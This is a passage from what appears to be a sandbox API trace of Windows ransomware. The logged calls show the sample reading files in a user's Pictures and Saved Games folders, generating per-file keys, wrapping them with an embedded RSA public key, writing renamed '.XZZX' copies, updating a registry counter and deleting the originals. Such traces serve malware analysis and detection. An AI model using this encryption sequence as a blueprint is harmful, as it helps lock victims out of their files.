lpDistanceToMoveHigh=0x0) returned 0xdcfb [0127.605] WriteFile (in: hFile=0x62c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0127.605] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdd00 [0127.605] WriteFile (in: hFile=0x62c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x28, lpOverlapped=0x0) returned 1 [0127.605] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdd28 [0127.605] WriteFile (in: hFile=0x62c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0127.605] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdd2d [0127.605] SetErrorMode (uMode=0x1) returned 0x1 [0127.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0127.606] OutputDebugStringW (lpOutputString="end") [0127.606] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.606] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0127.606] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1e920) returned 1 [0127.607] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1e920, dwCertEncodingType=0x1, pInfo=0x3d0df08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0df38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0df40*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde058) returned 1 [0127.607] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.607] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0127.607] CryptEncrypt (in: hKey=0x3cde058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0127.607] CryptEncrypt (in: hKey=0x3cde058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1e9a8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1e9a8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0127.607] WriteFile (in: hFile=0x62c, lpBuffer=0x3d1e9a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1e9a8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0127.607] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0127.608] WriteFile (in: hFile=0x62c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0127.608] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0127.608] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0127.608] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x638) returned 0x0 [0127.608] RegQueryValueExW (in: hKey=0x638, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xa0, lpcbData=0x420dfdc*=0x4) returned 0x0 [0127.608] RegCloseKey (hKey=0x638) returned 0x0 [0127.608] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x638) returned 0x0 [0127.608] RegSetValueExW (in: hKey=0x638, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xa1, cbData=0x4 | out: lpData=0x420dfec*=0xa1) returned 0x0 [0127.608] RegCloseKey (hKey=0x638) returned 0x0 [0127.609] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.609] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.609] CloseHandle (hObject=0x62c) returned 1 [0127.610] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0127.611] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0127.611] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yj-AfpoJM9u50s86.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yj-afpojm9u50s86.png")) returned 1 [0127.612] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yj-AfpoJM9u50s86.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yj-afpojm9u50s86.png")) returned 0 Thread: id = 425 os_tid = 0x9b4 [0127.551] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.551] lstrcpyW (in: lpString1=0x434f460, lpString2="ylARzGL.png" | out: lpString1="ylARzGL.png") returned="ylARzGL.png" [0127.551] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0127.551] SetErrorMode (uMode=0x1) returned 0x1 [0127.551] lstrcpyW (in: lpString1=0x434f860, lpString2="ylARzGL.png" | out: lpString1="ylARzGL.png") returned="ylARzGL.png" [0127.551] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xf2368b01, Data2=0x36ce, Data3=0x43c6, Data4=([0]=0x94, [1]=0x6e, [2]=0xb0, [3]=0xf4, [4]=0xc9, [5]=0x7a, [6]=0x19, [7]=0x8b))) returned 0x0 [0127.551] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ylARzGL.png") returned 54 [0127.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0127.551] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\693610CE0E824D54F2368B0112B7319C.XZZX") returned 80 [0127.551] StrStrW (lpFirst="ylARzGL.png", lpSrch="XZZX") returned 0x0 [0127.551] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ylARzGL.png", dwFileAttributes=0x20) returned 1 [0127.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ylARzGL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ylarzgl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x62c [0127.552] ReadFile (in: hFile=0x62c, lpBuffer=0x3cff060, nNumberOfBytesToRead=0xb963, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cff060*, lpNumberOfBytesRead=0x434e418*=0xb963, lpOverlapped=0x0) returned 1 [0127.554] CloseHandle (hObject=0x62c) returned 1 [0127.554] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0127.554] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0127.555] SetErrorMode (uMode=0x1) returned 0x1 [0127.555] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0127.555] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1e898) returned 1 [0127.558] CryptGenKey (in: hProv=0x3d1e898, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde0d8) returned 1 [0127.702] CryptExportKey (in: hKey=0x3cde0d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0127.702] CryptExportKey (in: hKey=0x3cde0d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0127.702] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.703] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0127.703] CryptDestroyKey (hKey=0x3cde0d8) returned 1 [0127.703] CryptReleaseContext (hProv=0x3d1e898, dwFlags=0x0) returned 0 [0127.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\693610CE0E824D54F2368B0112B7319C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\693610ce0e824d54f2368b0112b7319c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0127.705] WriteFile (in: hFile=0x628, lpBuffer=0x3cff060*, nNumberOfBytesToWrite=0xb963, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cff060*, lpNumberOfBytesWritten=0x434e438*=0xb963, lpOverlapped=0x0) returned 1 [0127.706] SetFilePointer (in: hFile=0x628, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb963 [0127.706] WriteFile (in: hFile=0x628, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0127.706] SetFilePointer (in: hFile=0x628, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb968 [0127.706] WriteFile (in: hFile=0x628, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x16, lpOverlapped=0x0) returned 1 [0127.707] SetFilePointer (in: hFile=0x628, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb97e [0127.707] WriteFile (in: hFile=0x628, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0127.707] SetFilePointer (in: hFile=0x628, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb983 [0127.707] SetErrorMode (uMode=0x1) returned 0x1 [0127.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0127.707] OutputDebugStringW (lpOutputString="end") [0127.707] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.707] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0127.707] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3d1ea30) returned 1 [0127.708] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1ea30, dwCertEncodingType=0x1, pInfo=0x3d0daf8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0db28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0db30*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cde0d8) returned 1 [0127.708] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.709] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0127.709] CryptEncrypt (in: hKey=0x3cde0d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0127.709] CryptEncrypt (in: hKey=0x3cde0d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1eab8*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1eab8*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0127.709] WriteFile (in: hFile=0x628, lpBuffer=0x3d1eab8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1eab8*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0127.709] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0127.709] WriteFile (in: hFile=0x628, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0127.709] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0127.709] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0127.709] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x62c) returned 0x0 [0127.709] RegQueryValueExW (in: hKey=0x62c, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xa1, lpcbData=0x434dfdc*=0x4) returned 0x0 [0127.709] RegCloseKey (hKey=0x62c) returned 0x0 [0127.709] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x62c) returned 0x0 [0127.710] RegSetValueExW (in: hKey=0x62c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xa2, cbData=0x4 | out: lpData=0x434dfec*=0xa2) returned 0x0 [0127.710] RegCloseKey (hKey=0x62c) returned 0x0 [0127.710] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.710] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.710] CloseHandle (hObject=0x628) returned 1 [0127.711] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0127.712] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0127.712] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ylARzGL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ylarzgl.png")) returned 1 [0127.713] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ylARzGL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ylarzgl.png")) returned 0 Thread: id = 426 os_tid = 0x9b8 [0127.719] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.719] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0127.719] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0127.719] SetErrorMode (uMode=0x1) returned 0x1 [0127.719] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0127.719] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x469a8e79, Data2=0xf8a7, Data3=0x46cf, Data4=([0]=0x95, [1]=0x6c, [2]=0x97, [3]=0x9, [4]=0xde, [5]=0xb2, [6]=0x67, [7]=0x3c))) returned 0x0 [0127.719] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0127.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0127.719] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\C8D828EF44C6B909469A8E7948E79D51.XZZX") returned 83 [0127.719] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0127.719] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", dwFileAttributes=0x20) returned 1 [0127.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0127.720] ReadFile (in: hFile=0x628, lpBuffer=0x3ce56b8, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce56b8*, lpNumberOfBytesRead=0x420e418*=0x11a, lpOverlapped=0x0) returned 1 [0127.720] CloseHandle (hObject=0x628) returned 1 [0127.721] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0127.721] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0127.721] SetErrorMode (uMode=0x1) returned 0x1 [0127.721] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0127.721] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1eb40) returned 1 [0127.724] CryptGenKey (in: hProv=0x3d1eb40, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde258) returned 1 [0127.955] CryptExportKey (in: hKey=0x3cde258, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0127.955] CryptExportKey (in: hKey=0x3cde258, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0127.955] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.956] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0127.956] CryptDestroyKey (hKey=0x3cde258) returned 1 [0127.956] CryptReleaseContext (hProv=0x3d1eb40, dwFlags=0x0) returned 1 [0127.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\C8D828EF44C6B909469A8E7948E79D51.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\c8d828ef44c6b909469a8e7948e79d51.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0127.959] WriteFile (in: hFile=0x644, lpBuffer=0x3ce56b8*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce56b8*, lpNumberOfBytesWritten=0x420e438*=0x11a, lpOverlapped=0x0) returned 1 [0127.959] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11a [0127.960] WriteFile (in: hFile=0x644, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, 